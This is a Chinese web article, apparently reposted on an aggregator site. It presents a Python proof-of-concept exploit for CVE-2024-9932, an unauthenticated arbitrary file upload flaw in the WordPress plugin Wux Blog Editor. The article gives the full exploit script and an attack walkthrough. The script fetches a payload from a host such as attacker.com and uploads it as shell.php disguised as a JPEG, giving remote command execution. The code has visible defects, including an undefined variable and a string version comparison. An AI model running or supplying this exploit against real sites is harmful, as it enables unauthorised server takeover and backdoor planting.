Wux Blog Editor漏洞利用工具CVE-2024-9932
Wux Blog Editor 任意文件上传漏洞利用工具 (CVE-2024-9932) 这是一个专为 WordPress 插件 Wux Blog Editor 设计的安全概念验证(PoC)脚本。该插件在 3 0 0 版本及之前存在一个严重漏洞——未经身份验证的攻击者可以绕过文件类型验证,上传任意文
Wux Blog Editor 任意文件上传漏洞利用工具 (CVE-2024-9932)
这是一个专为 WordPress 插件 Wux Blog Editor 设计的安全概念验证(PoC)脚本。该插件在 3.0.0 版本及之前存在一个严重漏洞——未经身份验证的攻击者可以绕过文件类型验证,上传任意文件到服务器,进而有可能实现远程代码执行(RCE)。简单来说,就是攻击者能直接往目标网站里塞任何东西,危险性不言而喻。

功能特性
- 任意文件上传:利用
wuxbt_insertImageNew函数中不充分的文件类型验证,上传任意远程文件。 - 远程代码执行:支持上传包含恶意代码(如 PHP Shell)的文件,实现远程命令执行。
- 自定义文件名:可指定上传后的文件名,便于访问和利用。
- 教育用途:帮助安全研究人员理解漏洞原理,测试自身环境安全性。
安装指南
系统要求
- Python 3.6 或更高版本
requests库
安装步骤
- 克隆项目:
git clone https://github.com/your-repo/CVE-2024-9932-POC.git cd CVE-2024-9932-POC - 安装依赖:
pip install requests - 验证安装:
如果看到帮助信息,说明已经准备就绪。python CVE-2024-9932.py -h
使用说明
基本语法
python CVE-2024-9932.py -u <目标URL> -ur <远程文件URL> [-n <目标文件名>]
参数说明
| 参数 | 简写 | 必填 | 描述 |
|---|---|---|---|
--url | -u | 是 | WordPress 目标站点的基础 URL(例如 http://example.com/wordpress) |
--remote-url | -ur | 是 | 包含恶意内容的远程文件 URL(例如 http://attacker.com/shell.txt) |
--name | -n | 否 | 上传后保存的文件名(例如 shell.php),默认为 shell.php |
使用示例
示例1:上传默认名称的 PHP Shell
python CVE-2024-9932.py -u http://192.168.100.74/wordpress -ur http://192.168.100.54/shell.txt
示例2:自定义上传文件名
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n backdoor.php
典型攻击场景
- 信息收集:使用
-u参数识别目标 WordPress 站点的插件版本。 - 准备载荷:在公网或本地服务器上托管包含 PHP 恶意代码的文本文件(如
shell.txt)。 - 发起攻击:执行上述命令,将载荷上传至目标服务器的
wp-content/uploads/年/月/目录。 - 获得权限:访问返回的文件 URL(例如
http://victim.com/wordpress/wp-content/uploads/2025/01/shell.php)即可执行命令。
成功输出示例
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
核心代码
漏洞利用主脚本 (CVE-2024-9932.py)
import argparse
import requests
import sys
def banner():
print("""...""") # 略去ASCII艺术图
def check_version(base_url):
"""检测插件版本"""
try:
response = requests.get(version_url)
if response.status_code == 200:
for line in response.text.splitlines():
if line.startswith("Stable tag:"):
version = line.split(":")[1].strip()
print(f"[+] Detected Wux Blog Editor version: {version}")
return version
print("[-] Could not determine plugin version. Target may be not vulnerable.")
return None
except Exception as e:
print(f"[-] Version check failed: {e}")
return None
def exploit(target_url, remote_file_url, file_name):
"""执行漏洞利用:上传远程文件至目标服务器"""
upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php"
files = {
'action': (None, 'wuxbt_insertImageNew'),
'file': (file_name, requests.get(remote_file_url).content, 'image/jpeg')
}
try:
response = requests.post(upload_endpoint, files=files)
if response.status_code == 200:
if "wp-content/uploads" in response.text:
import re
match = re.search(r'(wp-content/uploads/[^s"']+.php)', response.text)
if match:
full_url = f"{target_url}/{match.group(1)}"
print(f"[+] File found: {full_url}")
else:
print("[+] File uploaded successfully, but URL could not be extracted automatically.")
else:
print("[-] Upload may ha ve failed. Response does not indicate success.")
else:
print(f"[-] Upload failed with HTTP status {response.status_code}")
except Exception as e:
print(f"[-] Exploit failed: {e}")
def main():
banner()
parser = argparse.ArgumentParser(description="Wux Blog Editor - Arbitrary File Upload")
parser.add_argument("-u", "--url", required=True, help="Base URL of the WordPress server")
parser.add_argument("-ur", "--remote-url", required=True, help="Remote file URL")
parser.add_argument("-n", "--name", default="shell.php", help="Desired file name")
args = parser.parse_args()
version = check_version(args.url)
if version and version <= "3.0.0":
print("[+] Target appears vulnerable. Proceeding with exploit...")
exploit(args.url, args.remote_url, args.name)
else:
print("[-] Target does not seem vulnerable or version check failed.")
sys.exit(1)
if __name__ == "__main__":
main()
漏洞原理说明
这个漏洞的根源在于插件中 wuxbt_insertImageNew 函数对上传文件的 MIME 类型检查不够严格。攻击者可以这样做:
- 将恶意 PHP 代码伪装成合法的图片 MIME 类型(比如
image/jpeg)。 - 通过
admin-ajax.php端点触发文件上传功能。 - 服务器只检查了 MIME 类型,却没有验证文件的真实内容,于是 PHP 文件就被顺利保存了下来。
- 上传的文件被存放在
/wp-content/uploads/年/月/目录下,攻击者可以直接通过 HTTP 访问并执行它。
⚠️ 免责声明
本工具仅用于教育目的和安全研究。未经系统所有者明确授权,使用此脚本攻击任何系统均属违法行为。使用者需自行承担一切法律责任。
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
同类文章
天学会AI应用开发上下文与RAG阶段性总结
系统梳理了AI应用开发中的上下文与RAG核心概念。搭建Python3 10开发环境后,通过提示词工程管理历史对话,利用截断、摘要提取及离线大模型压缩上下文。RAG采用加载文档、分块、向量化、存入FAISS或Chroma库、检索五个步骤,中文场景推荐BGE-small嵌入模型,实战证明离线检索有效。
Yank Note系列14:如何与AI协作写文章
YankNote3 92 1发布,新增“审阅批注”和“编辑装订线”扩展,聚焦AI写作的人机协作循环。审阅批注将反馈绑定到选中文本,编辑装订线高亮显示修改行,帮助人看清AI改动。同时升级Markdown-it至14 3 0,优化中日韩文本渲染。
一文读懂MCP:让AI大模型万能插拔协议
MCP(模型上下文协议)由Anthropic提出,为AI大模型提供通用接口标准,解决工具调用碎片化问题。采用Host Client Server架构,支持动态发现工具,通过stdio或HTTP通信,实现工具即插即用、跨语言调用和统一对接规范。
BeeWeave开源:为AI Agent打造越用越懂你的知识创作台
BeeWeave是一个Agent原生的知识创作台,通过workbench和vault双层结构实现素材获取、内容创作、知识沉淀与上下文复用的持续闭环。它支持多Agent共用同一套知识库,内置41个Skills,采用MIT开源协议,旨在解决跨会话知识丢失问题。
AI闭环工程师自动推进工程任务
LoopEngineer是一种将AI嵌入可执行、可验证、可持续迭代的工作循环中的工程协作方式。通过触发器、上下文、工具和验证机制,AI在循环中自动分析、执行、验证并调整,直至任务完成或需人工介入,实现复杂任务的可观察、可审计、可批准的分段自动化。
- 热门数据榜
相关攻略
2026-07-12 16:04
2026-07-12 16:04
2026-07-12 16:04
2026-07-12 15:04
2026-07-12 15:04
2026-07-12 15:04
2026-07-12 15:03
2026-07-12 15:03
热门教程
- 游戏攻略
- 安卓教程
- 苹果教程
- 电脑教程

